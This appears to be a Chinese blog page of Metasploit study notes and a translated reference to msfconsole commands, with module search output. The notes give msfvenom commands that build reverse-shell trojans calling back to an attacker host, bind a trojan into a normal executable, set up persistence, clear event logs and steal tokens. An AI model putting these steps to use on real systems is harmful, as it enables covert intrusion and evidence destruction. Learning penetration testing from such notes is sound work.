精华内容
下载资源
问答
  • msfconsole
    千次阅读
    2022-02-18 21:27:24

    msfconsole启动msf控制台后
    └─msfconsole                                         2 ⨯


             .                                         .
     .

          dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
           '   dB'                     BBP
        dB'dB'dB' dBBP     dBP     dBP BB
       dB'dB'dB' dBP      dBP     dBP  BB
      dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                       dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
              .                  .                  dB' dBP    dB'.BP
                                 |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                               --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                                 |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

         .
                    .
            o                  To boldly go where no
                                shell has gone before


           =[ metasploit v6.1.28-dev                          ]
    + -- --=[ 2197 exploits - 1163 auxiliary - 400 post       ]
    + -- --=[ 596 payloads - 45 encoders - 11 nops            ]
    + -- --=[ 9 evasion                                       ]

    Metasploit tip: View all productivity tips with the
    tips command

    msf6 > banner
    Call trans opt: received. 2-19-98 13:24:18 REC:Loc

         Trace program: running

               wake up, Neo...
            the matrix has you
          follow the white rabbit.

              knock, knock, Neo.

                            (`.         ,-,
                            ` `.    ,;' /
                             `.  ,'/ .'
                              `. X /.'
                    .-;--''--.._` ` (
                  .'            /   `
                 ,           ` '   Q '
                 ,         ,   `._    \
              ,.|         '     `-.;_'
              :  . `  ;    `  ` --,.._;
               ' `    ,   )   .'
                  `._ ,  '   /_
                     ; ,''-,;' ``-
                      ``-..__``--`

                                 https://metasploit.com


           =[ metasploit v6.1.28-dev                          ]
    + -- --=[ 2197 exploits - 1163 auxiliary - 400 post       ]
    + -- --=[ 596 payloads - 45 encoders - 11 nops            ]
    + -- --=[ 9 evasion                                       ]

    Metasploit tip: You can pivot connections over sessions
    started with the ssh_login modules

     

     

    Cve指定平台Exp漏洞搜索搭配参数如下:

    msf6 > grep windows search cve:2021
       0 exploit/windows/http/advantech_iview_unauth_rce                         2021-02-09       excellent  Yes    Advantech iView Unauthenticated Remote Code Execution
       4   exploit/windows/local/canon_driver_privesc                              2021-08-07       normal     Yes    Canon Driver Privilege Escalation
       8   exploit/windows/local/cve_2021_21551_dbutil_memmove                     2021-05-04       good       Yes    Dell DBUtil_2_3.sys IOCTL memmove
       12  exploit/windows/http/fortilogger_arbitrary_fileupload                   2021-02-26       normal     Yes    FortiLogger Arbitrary File Upload Exploit
       17  exploit/windows/local/lexmark_driver_privesc                            2021-07-15       normal     Yes    Lexmark Driver Privilege Escalation
       20  exploit/windows/http/exchange_proxylogon_rce                            2021-03-02       excellent  Yes    Microsoft Exchange ProxyLogon RCE
       22  exploit/windows/http/sharepoint_unsafe_control                          2021-05-11       excellent  Yes    Microsoft SharePoint Unsafe Control and ViewState RCE
       23  exploit/windows/http/netmotion_mobility_mvcutil_deserialization         2021-02-08       excellent  Yes    NetMotion Mobility Server MvcUtil Java Deserialization
       34  exploit/windows/local/cve_2021_1732_win32k                              2021-02-10       good       Yes    Win32k ConsoleControl Offset Confusion
       35  post/windows/gather/credentials/windows_sam_hivenightmare               2021-07-20       normal     No     Windows SAM secrets leak - HiveNightmare
    msf6 >

     

    更多

    msf6 > help search
    Usage: search [<options>] [<keywords>:<value>]

    Prepending a value with '-' will exclude any matching results.
    If no options or keywords are provided, cached results are displayed.


    OPTIONS:

        -h, --help                      Help banner
        -I, --ignore                    Ignore the command if the only match has the same name as the search
        -o, --output <filename>         Send output to a file in csv format
        -r, --sort-descending <column>  Reverse the order of search results to descending order
        -S, --filter <filter>           Regex pattern used to filter search results
        -s, --sort-ascending <column>   Sort search results by the specified column in ascending order
        -u, --use                       Use module if there is one result

    Keywords:
      aka              :  Modules with a matching AKA (also-known-as) name
      author           :  Modules written by this author
      arch             :  Modules affecting this architecture
      bid              :  Modules with a matching Bugtraq ID
      cve              :  Modules with a matching CVE ID
      edb              :  Modules with a matching Exploit-DB ID
      check            :  Modules that support the 'check' method
      date             :  Modules with a matching disclosure date
      description      :  Modules with a matching description
      fullname         :  Modules with a matching full name
      mod_time         :  Modules with a matching modification date  name             :  Modules with a matching descriptive name
      path             :  Modules with a matching path
      platform         :  Modules affecting this platform
      port             :  Modules with a matching port
      rank             :  Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400'))
      ref              :  Modules with a matching ref
      reference        :  Modules with a matching reference
      target           :  Modules affecting this target
      type             :  Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)

    Supported search columns:
      rank             :  Sort modules by their exploitabilty rank
      date             :  Sort modules by their disclosure date. Alias for disclosure_date
      disclosure_date  :  Sort modules by their disclosure date
      name             :  Sort modules by their name
      type             :  Sort modules by their type
      check            :  Sort modules by whether or not they have a check method

     

    searchExamples:
      search cve:2009 type:exploit
      search cve:2009 type:exploit platform:-linux
      search cve:2009 -s name
      search type:exploit -s type -r

    更多相关内容
  • msfconsole

    2018-12-12 10:30:38
    kail、ubantu的msfconsole平台的用法,如search导入,use调用等等
  • 渗透大全msfconsole.ppt

    2019-11-12 15:03:51
    又称作正片,是一种底片或菲林。常见的规格有135和120两种。通常是彩色,但特殊目的也有黑白的正片。也可用来印相或放大相片。 现在通常说的幻灯片多指电子幻灯片(演示文稿)。
  • msfconsole学习

    千次阅读 2021-06-28 22:27:51
    工具: Quasar-win: AhMyth-andriod: msfconsole启动: msfconsole msfconsole -q :无启动状态显示 一、MSF生成木马并连接 使用攻击模块:use exploit/multi/handler 指令:show options - 查看需要填写的参数和...

    工具:

            Quasar-win:

            AhMyth-andriod:

    msfconsole启动:

            msfconsole

            msfconsole -q :无启动状态显示

    一、MSF生成木马并连接

            使用攻击模块:use exploit/multi/handler

            指令:show options - 查看需要填写的参数和参数填写状态      

    NameCurrent SettingRequiredDescription
    LHOSTyesThe listen address (an interface may be specified)
     LPORT4444yesThe listen port

            设置LHOST和LPORT: set LHOST 本地ip LPORT 本地启用端口

            查看payload:show payloads

            设置payload:set payload windows/meterpreter/reverse_tcp

    木马生成:

            使用msfvenom

            msfvenom -p windows/meterpreter/reverse_tcp -f exe -a x86 -o ./meter_re_tcp_x86.exe LHOST=本地ip LPORT=本地端口

             msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -a x64 -o ./meter_re_tcp_x64.exe LHOST=本地ip LPORT=本地端口

    运行监听:

            先进入使用模块

            run

            exploit


    二、MSF木马VBS配置

    windows-vbs:

            vbs:源码型脚本

            使用msfvenom

            msfvenom -p windows/meterpreter/reverse_tcp -f vbs -a x86 -o ./meter_re_tcp_x86.exe LHOST=本地ip LPORT=本地端口

    msfconsole -r file        (文件中写相关命令,msfmu 会自动读取文件并执行)


    三、MSF木马捆绑

            将木马捆绑到正常文件当中

            msfvenom -p windows/meterpreter/reverse_tcp -f exe -x ./test.exe -a x86 --platform windows -o ./kunbang.exe LHOST=连接ip LPORT=4444

            注意:找一个有效的可执行文件

    木马混淆

            


    Meterpreter

    一、概述

            用于木马管理(操作电脑,功能完全)

    二、操作

            1. 连接之后,屏幕实时显示:screenshare

            2.操作控制:ls查看文件

            3.上传下载:download 文件名   

    #文件操作:

            linux文件命令操作方式

            文件路径:本机:getlwd        远程:getwd

            下载文件:download 文件名     

            上传文件:upload

            编辑:edit 文件名

            搜索文件:search 文件名

            查看挂载硬盘:show_mount

            hash查看:checksum

    #系统操作

    编号描述命令
    1提权getsystem
    2清除事件日志clearev
    3获取环境变量getenv
    4获取pidgetpid

    Command       Description
        -------       -----------
        clearev       Clear the event log
        drop_token    Relinquishes any active impersonation token.
        execute       Execute a command
        getenv        Get one or more environment variable values
        getpid        Get the current process identifier
        getprivs      Attempt to enable all privileges available to the current process
        getsid        Get the SID of the user that the server is running as
        getuid        Get the user that the server is running as
        kill          Terminate a process
        localtime     Displays the target system local date and time
        pgrep         Filter processes by name
        pkill         Terminate processes by name
        ps            List running processes
        reboot        Reboots the remote computer
        reg           Modify and interact with the remote registry
        rev2self      Calls RevertToSelf() on the remote machine提权恢复
        shell         Drop into a system command shell
        shutdown      Shuts down the remote computer
        steal_token   Attempts to steal an impersonation token from the target process
        suspend       Suspends or resumes a list of processes
        sysinfo       Gets information about the remote system, such as OS

    #网络操作

     Command       Description
        -------       -----------
        arp           Display the host ARP cache
        getproxy      Display the current proxy configuration
        ifconfig      Display interfaces
        ipconfig      Display interfaces
        netstat       Display the network connections
        portfwd       Forward a local port to a remote service端口转发
        resolve       Resolve a set of host names on the target
        route         View and modify the routing table

    端口转发:       

    #其他操作

    交互命令

            键盘、鼠标操作和记录;关闭键盘、鼠标事件

            修改时间戳

    三、MSF链接多个木马

            set exitonsession false        #可以连接多个session,默认true

            run -j        #后台监听

            jobs        #查看监听

            jobs -p        关闭监听

            sessions -i id        #进行操作

            bg        #回退

            jobs -k        #关闭监听                                        

    四、MSF木马持久化

            show advanced        #高级指令

            run persistence  -参数        #设置持久化

    meterpreter> run  persistence -参数

            重新生成一个木马(vbs)放入启动项

    五、MSF进程迁移

            execute:

            eg:execute -f notepad

            学习参数

            execute -f cmd -i进行交互 -H隐藏启动

            

            execute -f /home/kali/Desktop/cmd.exe -m -d notepad        #傀儡进程

    六、MSF漏洞扫描

           查找漏洞-使用此攻击模块-进行设置-进行检测-进行攻击

            show target 设置攻击目标

            back回退到msf6>

            ?/help        #查看命令

            search 漏洞名称        #搜索漏洞

            check        #检测该主机是否由此漏洞

            eg:使用永恒之蓝进行攻击测试:代号:ms17_010_eternalblue

    七、MSF漏洞扫描内网穿透   

            公网连接内网需要进行内网穿透

            端口转发            

    八、MSF-Stager&Stage

            payload三种方式:

                    single

                    Stager Stage

            windows/(x64)/stage/stager

    eg:windows/x64/meterpreter/reverse_tcp     meterpreter:stage  reverse_tcp:stager

    攻击成功:先发送stage放入到对方电脑-只有连接作用

    分类:

            返回stage使用stager的连接方式 

    九、exploit小结    

            根据情况选择攻击模块并使用

            根据情况选择payload并使用

            查看选项:show options

            查看高级:show advanced

            设置参数:set

            检测能否攻击 

            运行进行攻击

            使用handler进行便捷监听


    MSF-Linux攻击

    msf6>use payload/linux/x64/meterpreter/reverse_tcp

    进行设置

    generate -f 文件格式 -o 输出路径        #生成木马

    handler -H 连接ip -P 连接端口 -n 名字 -p payload 

            


    MSF-Mac攻击

    OSX

    和linux一样


    MSF-Andriod&IOS攻击


     MSF-生成跨平台木马

    生成源码

            可以跨平台执行的编程语言源码或执行文件

    展开全文
  • MSFconsole核心命令教程

    2020-12-18 19:27:22
    MSFconsole有许多不同的命令选项可供选择。以下是Metasploit命令的核心组合,并参考其格式。back 从当前上下文返回 banner 显示一个很棒的metasploit横幅 cd 更改当前的工作目录 color 切换颜色 connect 与主机通信 ...

    MSFconsole有许多不同的命令选项可供选择。以下是Metasploit命令的核心组合,并参考其格式。

    back 从当前上下文返回 banner 显示一个很棒的metasploit横幅 cd 更改当前的工作目录 color 切换颜色 connect 与主机通信 edit 使用$ VISUAL或$ EDITOR编辑当前模块 exit 退出控制台 get 特定于上下文的变量的值 getg 获取全局变量的值 go_pro 启动Metasploit Web GUI

    grep Grep另一个命令的输出 help 菜单 info 显示有关一个或多个模块的信息 irb 进入irb脚本模式 jobs 显示和管理工作 kill 杀死一份工作 load 加载一个框架插件 loadpath 搜索并加载路径中的模块 makerc 保存从开始到文件输入的命令 popm 将最新的模块从堆栈弹出并使其处于活动状态previous 将之前加载的模块设置为当前模块 pushm 将活动或模块列表推入模块堆栈 quit 退出控制台 reload_all 重新加载所有定义的模块路径中的所有模块 rename_job 重命名作业 resource 运行存储在文件中的命令 route 通过会话路由流量 save 保存活动的数据存储 search 搜索模块名称和说明 sessions 转储会话列表并显示有关会话的信息

    set 将特定于上下文的变量设置为一个值 setg 将全局变量设置为一个值 show 显示给定类型的模块或所有模块 sleep 在指定的秒数内不执行任何操作 spool 将控制台输出写入文件以及屏幕 threads 查看和操作后台线程 unload 卸载框架插件 unset 取消设置一个或多个特定于上下文的变量 unsetg 取消设置一个或多个全局变量 use 按名称选择模块 version 显示框架和控制台库版本号

    back

    一旦你完成了一个特定的模块的工作,或者你无意中选择了错误的模块,你可以发出back命令移出当前的上下文。但是,这不是必需的。就像在商用路由器中一样,您可以从其他模块中切换模块。提醒一下,变量只有在全球范围内设定后才能继续。

    msf auxiliary(ms09_001_write) > back

    msf >

    banner

    只需显示随机选择的横幅

    msf > banner

    ______________________________________________________________________________

    | |

    | 3Kom SuperHack II Logon |

    |______________________________________________________________________________|

    | |

    | |

    | |

    | User Name: [ security ] |

    | |

    | Password: [ ] |

    | |

    | |

    | |

    | [ OK ] |

    |______________________________________________________________________________|

    | |

    | https://metasploit.com |

    |______________________________________________________________________________|

    =[ metasploit v4.16.8-dev ]

    + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]

    + -- --=[ 498 payloads - 40 encoders - 10 nops ]

    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

    check

    支持它的漏洞并不多,但也有一个check选项,用于检查目标是否容易受到特定漏洞攻击,而不是实际利用漏洞。

    msf exploit(ms08_067_netapi) > show options

    Module options (exploit/windows/smb/ms08_067_netapi):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST 172.16.194.134 yes The target address

    RPORT 445 yes Set the SMB service port

    SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

    Exploit target:

    Id Name

    -- ----

    0 Automatic Targeting

    msf exploit(ms08_067_netapi) > check

    [*] Verifying vulnerable status... (path: 0x0000005a)

    [*] System is not vulnerable (status: 0x00000000)

    [*] The target is not exploitable.

    msf exploit(ms08_067_netapi) >

    color

    如果通过msfconsole获得的输出将包含颜色,则可以启用或禁用颜色输出。

    msf > color

    Usage: color

    Enable or disable color output.

    msf > color false

    connect

    msfconsole内置了一个微型Netcat克隆,它支持SSL,代理服务器,枢纽和文件传输。

    通过使用IP地址和端口号发出connect命令,您可以像使用Netcat或Telnet一样,从msfconsole连接到远程主机。

    msf > connect 192.168.1.1 23

    [*] Connected to 192.168.1.1:23

    DD-WRT v24 std (c) 2018 NewMedia-NET GmbH

    Release: 04/17/18 (SVN revision: 10011)

    DD-WRT login:

    您可以通过发出“-h”参数来查看所有附加选项。

    msf > connect -h用法: connect [选项] 描述: 与主机通信,类似于通过netcat进行交互,利用任何配置的会话透视。 选项: -C 尝试将CRLF用于EOL序列。 -P 指定源端口。 -S 指定源地址。 -c 指定使用哪个Comm。 -h 帮助横幅。 -i 发送文件的内容。 -p 使用的代理列表。 -s 使用SSL连接。 -u 切换到UDP套接字。 -w 定连接超时。 -z 试着连接,然后返回。

    edit

    该edit命令将edit与$ VISUAL或$ EDITOR当前模块。默认情况下,这将在Vim中打开当前模块。

    msf > use exploit/windows/smb/ms10_061_spoolss

    msf exploit(ms10_061_spoolss) > edit

    [*] Launching /usr/bin/vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms10_061_spoolss.rb

    ##

    # This module requires Metasploit: http//metasploit.com/download

    # Current source: https://github.com/rapid7/metasploit-framework

    ##

    require 'msf/core'

    require 'msf/windows_error'

    class Metasploit3 > Msf::Exploit::Remote

    Rank = ExcellentRanking

    include Msf::Exploit::Remote::DCERPC

    include Msf::Exploit::Remote::SMB

    include Msf::Exploit::EXE

    include Msf::Exploit::WbemExec

    def initialize(info = {})

    exit

    在exit命令会退出msfconsole。

    msf exploit(ms10_061_spoolss) > exit

    root@kali:~#

    grep

    该grep的命令类似的Linux的grep。它匹配来自另一个msfconsole命令输出的给定模式。

    以下是使用grep从包含字符串“oracle”的模块搜索中匹配包含字符串“http”的输出的示例。

    msf > grep用法: grep [options] pattern cmd grep [选项] 匹配词 命令 描述: grep控制台命令的结果(类似于Linux grep命令) 选项: -A 显示输出的参数行匹配后。 -B 在匹配前显示输出的参数行。 -c 仅打印匹配行数。 -h 帮助横幅。 -i 忽略大小写。 -k 在输出开始处保持(包含)arg行。 -m 在arg匹配后停止。 -s 在尝试匹配之前跳过输出的arg行。 -v 反转匹配。

    msf > grep http search oracle

    auxiliary/scanner/http/oracle_demantra_database_credentials_leak 2014-02-28 normal Oracle Demantra Database Credentials Leak

    auxiliary/scanner/http/oracle_demantra_file_retrieval 2014-02-28 normal Oracle Demantra Arbitrary File Retrieval with Authentication Bypass

    auxiliary/scanner/http/oracle_ilom_login normal Oracle ILO Manager Login Brute Force Utility

    exploit/multi/http/glassfish_deployer 2011-08-04 excellent Sun/Oracle GlassFish Server Authenticated Code Execution

    exploit/multi/http/oracle_ats_file_upload 2016-01-20 excellent Oracle ATS Arbitrary File Upload

    exploit/multi/http/oracle_reports_rce 2014-01-15 great Oracle Forms and Reports Remote Code Execution

    exploit/windows/http/apache_chunked 2002-06-19 good Apache Win32 Chunked Encoding

    exploit/windows/http/bea_weblogic_post_bof 2008-07-17 great Oracle Weblogic Apache Connector POST Request Buffer Overflow

    exploit/windows/http/oracle9i_xdb_pass 2003-08-18 great Oracle 9i XDB HTTP PASS Overflow (win32)

    exploit/windows/http/oracle_beehive_evaluation 2010-06-09 excellent Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability

    exploit/windows/http/oracle_beehive_prepareaudiotoplay 2015-11-10 excellent Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload

    exploit/windows/http/oracle_btm_writetofile 2012-08-07 excellent Oracle Business Transaction Management FlashTunnelService Remote Code Execution

    exploit/windows/http/oracle_endeca_exec 2013-07-16 excellent Oracle Endeca Server Remote Command Execution

    exploit/windows/http/oracle_event_processing_upload 2014-04-21 excellent Oracle Event Processing FileUploadServlet Arbitrary File Upload

    exploit/windows/http/osb_uname_jlist 2010-07-13 excellent Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability

    help

    该help命令会给你所有可用命令的列表和小描述。

    msf>help核心命令 ============= 命令说明 ------- ----------- ? 帮助菜单 banner 显示一个很棒的metasploit横幅 cd 更改当前的工作目录 color 切换颜色 connect 与主机通信 ...略... 数据库后端命令 ========================= 命令说明 ------- ----------- db_connect 连接到现有的数据库 db_disconnect 断开与当前数据库实例的连接 db_export 导出包含数据库内容的文件 db_import 导入扫描结果文件(文件类型将被自动检测) ...略...

    info

    该info命令将提供包括所有选项,目标和其它信息的特定模块的详细信息。请务必在使用之前始终阅读模块说明,因为有些可能会产生不希望的效果。

    info命令还提供了以下信息:作者和许可信息

    漏洞引用(即:CVE,BID等)

    模块可能具有的任何有效负载限制

    msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index

    msf exploit(ms09_050_smb2_negotiate_func_index) > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index

    [-] Invalid module: info

    Name: MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

    Module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index

    Platform: Windows

    Privileged: Yes

    License: Metasploit Framework License (BSD)

    Rank: Good

    Disclosed: 2009-09-07

    Provided by:

    Laurent Gaffie

    hdm

    sf

    Available targets:

    Id Name

    -- ----

    0 Windows Vista SP1/SP2 and Server 2008 (x86)

    Basic options:

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST yes The target address

    RPORT 445 yes The target port (TCP)

    WAIT 180 yes The number of seconds to wait for the attack to complete.

    Payload information:

    Space: 1024

    Description:

    This module exploits an out of bounds function table dereference in

    the SMB request validation code of the SRV2.SYS driver included with

    Windows Vista, Windows 7 release candidates (not RTM), and Windows

    2008 Server prior to R2. Windows Vista without SP1 does not seem

    affected by this flaw.

    References:

    https://technet.microsoft.com/en-us/library/security/MS09-050

    https://cvedetails.com/cve/CVE-2009-3103/

    http://www.securityfocus.com/bid/36299

    OSVDB (57799)

    http://seclists.org/fulldisclosure/2009/Sep/0039.html

    http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx

    msf exploit(ms09_050_smb2_negotiate_func_index) >

    irb

    运行irb命令将会让你进入一个真实的Ruby解释器shell,你可以在其中发布命令并创建Metasploit脚本。这个特性对于理解框架的内部也很有用。

    msf > irb

    [*] Starting IRB shell...

    >> puts "Hello, metasploit!"

    Hello, metasploit!

    => nil

    >> Framework::Version

    => "4.16.8-dev"

    jobs

    jobs是在后台运行的模块。该jobs命令提供列出和终止这些jobs的能力。

    msf > jobs -h用法: jobs [选项] 描述: 积极的jobs操作和交互。 选项: -K 终止所有正在运行的作业。 -S 行搜索过滤器。 -h 帮助横幅。 -i 列出有关正在运行的作业的详细信息。 -k 按作业ID和/或范围终止作业。 -l 列出所有正在运行的作业。 -v 打印更多详细信息。 与-i和-l一起使用

    kill

    使用jobs ID提供的kill命令将会终止任何正在运行的jobs。和linux中的kill相似;

    msf exploit(ms10_002_aurora) > kill 0

    Stopping job: 0...

    [*] Server stopped.

    load

    该load命令加载从Metasploit工具的插件 插件目录。参数在shell上以key = val的形式传递。

    msf > load用法: load [var=val var=val ...] 描述: 从提供的路径加载插件。 选项: 有关内置插件的列表,请执行以下操作:load -l 可选的var = val选项是可以传递给插件的自定义参数。

    msf > load pcap_log

    [*] PcapLog plugin loaded.

    [*] Successfully loaded plugin: pcap_log

    msf >

    loadpath

    该loadpath命令将加载第三部分模块树的路径,这样你可以在你的0-day,encoders(编码器),payloads(有效载荷)等成为一个Metasploit拥有更多漏洞工具集合;

    msf > loadpath /home/secret/modules

    Loaded 0 modules.

    unload

    相反,unload命令会卸载先前加载的插件并删除所有扩展的命令。

    msf > unload pcap_log

    Unloading plugin pcap_log...unloaded.

    resource

    该resource命令运行资源(批)可以通过msfconsole载入的文件。

    msf > resource用法: resource path1 [path2 ...] 描述: 运行存储在提供的文件中的命令。 资源文件也可能包含代码之间的ruby代码。 另见:makerc

    一些攻击,如Karmetasploit,使用资源文件在运行一组命令karma.rc文件中创建的攻击。稍后,我们将讨论在Karmetasploit之外,这可能非常有用。

    msf > resource karma.rc

    [*] Processing karma.rc for ERB directives.

    resource (karma.rc_.txt)> db_connect postgres:toor@127.0.0.1/msfbook

    resource (karma.rc_.txt)> use auxiliary/server/browser_autopwn

    ...略...

    批处理文件可以大大加快测试和开发时间,并允许用户自动完成许多任务。除了从msfconsole加载批处理文件外,还可以使用-r标志在启动时传递它们。

    下面的简单示例创建一个批处理文件,以在启动时显示Metasploit版本号。

    root@kali:~# echo version > version.rc

    root@kali:~# msfconsole -r version.rc

    IIIIII dTb.dTb _.---._

    II 4' v 'B .'"".'/|\`.""'.

    II 6. .P : .' / | \ `. :

    II 'T;. .;P' '.' / | \ `.'

    II 'T; ;P' `. / | \ .'

    IIIIII 'YvP' `-.__|__.-'

    I love shells --egypt

    =[ metasploit v4.16.8-dev ]

    + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]

    + -- --=[ 498 payloads - 40 encoders - 10 nops ]

    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

    [*] Processing version.rc for ERB directives.

    resource (version.rc)> version

    Framework: 4.16.8-dev

    Console : 4.16.8-dev

    route

    Metasploit中的“route”命令允许您通过session或'comm'路由套接字,从而提供基本的旋转功能。要添加路由,请传递目标子网和网络掩码,然后传递session (comm) 号码。

    msf > route -h

    通过提供的会话将流量发往指定的子网。用法: route [add/remove] subnet netmask [comm/sid] route [add/remove] cidr [comm/sid] route [get] route [flush] route [print] 子命令: add - 制作新路线 remove - 删除路线; 'del'是一个别名 flush - 删除所有路线 get - 显示给定目标的路线 print - 显示所有活动路线 例子: 通过session 1为从192.168.0.0到192.168.0.0的所有主机添加路由 route add 192.168.0.0 255.255.255.0 1 route add 192.168.0.0/24 1 删除上述路线 route remove 192.168.0.0/24 1 route del 192.168.0.0 255.255.255.0 1 显示将用于给定主机或网络的路线 route get 192.168.0.11

    meterpreter > route

    Network routes

    ==============

    Subnet Netmask Gateway

    ------ ------- -------

    0.0.0.0 0.0.0.0 172.16.1.254

    127.0.0.0 255.0.0.0 127.0.0.1

    172.16.1.0 255.255.255.0 172.16.1.100

    172.16.1.100 255.255.255.255 127.0.0.1

    172.16.255.255 255.255.255.255 172.16.1.100

    224.0.0.0 240.0.0.0 172.16.1.100

    255.255.255.255 255.255.255.255 172.16.1.100

    search

    msfconsole包含广泛的基于正则表达式的搜索功能。如果您对所查找内容有一个大致的了解,则可以通过搜索进行搜索。在下面的输出中,正在搜索MS Bulletin MS09-011。搜索功能将在模块名称,描述,引用等内找到该字符串。

    请注意,Metasploit模块的命名约定使用下划线和连字符。

    msf > search usermap_script

    Matching Modules

    ================

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution

    help

    您可以使用内置的关键字系统进一步优化您的搜索。

    msf > help search用法: search [关键字] 关键词: app:客户端或服务器攻击的模块 author:这个作者写的模块 bid:具有匹配的Bugtraq ID的模块 cve:具有匹配CVE ID的模块 edb:具有匹配的Exploit-DB ID的模块 name:具有匹配描述性名称的模块 platform:影响这个平台的模块 ref:具有匹配参考的模块 type:特定类型的模块(exploit,auxiliary或post) 例子: search cve:2009 type:exploit app:client

    name

    要使用描述性名称进行搜索,请使用name关键字。

    msf > search name:mysql

    Matching Modules

    ================

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    auxiliary/admin/mysql/mysql_enum normal MySQL Enumeration Module

    auxiliary/admin/mysql/mysql_sql normal MySQL SQL Generic Query

    auxiliary/analyze/jtr_mysql_fast normal John the Ripper MySQL Password Cracker (Fast Mode)

    auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal MySQL Authentication Bypass Password Dump

    auxiliary/scanner/mysql/mysql_file_enum normal MYSQL File/Directory Enumerator

    auxiliary/scanner/mysql/mysql_hashdump normal MYSQL Password Hashdump

    auxiliary/scanner/mysql/mysql_login normal MySQL Login Utility

    auxiliary/scanner/mysql/mysql_schemadump normal MYSQL Schema Dump

    auxiliary/scanner/mysql/mysql_version normal MySQL Server Version Enumeration

    auxiliary/scanner/mysql/mysql_writable_dirs normal MYSQL Directory Write Test

    auxiliary/server/capture/mysql normal Authentication Capture: MySQL

    exploit/linux/mysql/mysql_yassl_getname 2010-01-25 good MySQL yaSSL CertDecoder::GetName Buffer Overflow

    exploit/linux/mysql/mysql_yassl_hello 2008-01-04 good MySQL yaSSL SSL Hello Message Buffer Overflow

    exploit/windows/mysql/mysql_mof 2012-12-01 excellent Oracle MySQL for Microsoft Windows MOF Execution

    exploit/windows/mysql/mysql_payload 2009-01-16 excellent Oracle MySQL for Microsoft Windows Payload Execution

    exploit/windows/mysql/mysql_start_up 2012-12-01 excellent Oracle MySQL for Microsoft Windows FILE Privilege Abuse

    exploit/windows/mysql/mysql_yassl_hello 2008-01-04 average MySQL yaSSL SSL Hello Message Buffer Overflow

    exploit/windows/mysql/scrutinizer_upload_exec 2012-07-27 excellent Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential

    platform

    您可以使用platform将搜索范围缩小到影响特定platform(平台)的模块。

    msf > search platform:aix

    Matching Modules

    ================

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    exploit/aix/local/ibstat_path 2013-09-24 excellent ibstat $PATH Privilege Escalation

    exploit/aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow

    exploit/aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)

    payload/aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline

    payload/aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline

    payload/aix/ppc/shell_interact normal AIX execve Shell for inetd

    payload/aix/ppc/shell_reverse_tcp normal AIX Command Shell, Reverse TCP Inline

    post/aix/hashdump normal AIX Gather Dump Password Hashes

    post/multi/manage/sudo normal Multiple Linux / Unix Post Sudo Upgrade Shell

    post/multi/recon/local_exploit_suggester normal Multi Recon Local Exploit Suggester

    type

    使用该type可以按模块类型进行过滤,如auxiliary(辅助),post(提交),exploit(利用)等。

    msf > search type:post

    Matching Modules

    ================

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    post/linux/gather/checkvm normal Linux Gather Virtual Environment Detection

    post/linux/gather/enum_cron normal Linux Cron Job Enumeration

    post/linux/gather/enum_linux normal Linux Gather System Information

    ...略...

    author

    使用author关键字搜索可让您搜索您最喜爱的作者的模块。

    msf > search author:dookie

    Matching Modules

    ================

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    exploit/osx/http/evocam_webserver 2010-06-01 average MacOS X EvoCam HTTP GET Buffer Overflow

    exploit/osx/misc/ufo_ai 2009-10-28 average UFO: Alien Invasion IRC Client Buffer Overflow

    exploit/windows/browser/amaya_bdo 2009-01-28 normal Amaya Browser v11.0 'bdo' Tag Overflow

    exploit/windows/browser/communicrypt_mail_activex 2010-05-19 great CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow

    exploit/windows/browser/mozilla_reduceright 2011-06-21 normal Mozilla Firefox Array.reduceRight() Integer Overflow

    exploit/windows/browser/nctaudiofile2_setformatlikesample 2007-01-24 normal NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow

    exploit/windows/fileformat/a_pdf_wav_to_mp3 2010-08-17 normal A-PDF WAV to MP3 v1.0.0 Buffer Overflow

    exploit/windows/fileformat/adobe_illustrator_v14_eps 2009-12-03 great Adobe Illustrator CS4 v14.0.0

    exploit/windows/fileformat/audio_wkstn_pls 2009-12-08 good Audio Workstation 6.4.2.4.3 pls Buffer Overflow

    exploit/windows/fileformat/audiotran_pls 2010-01-09 good Audiotran 1.4.1 (PLS File) Stack Buffer Overflow

    exploit/windows/fileformat/fatplayer_wav 2010-10-18 normal Fat Player Media Player 0.6b0 Buffer Overflow

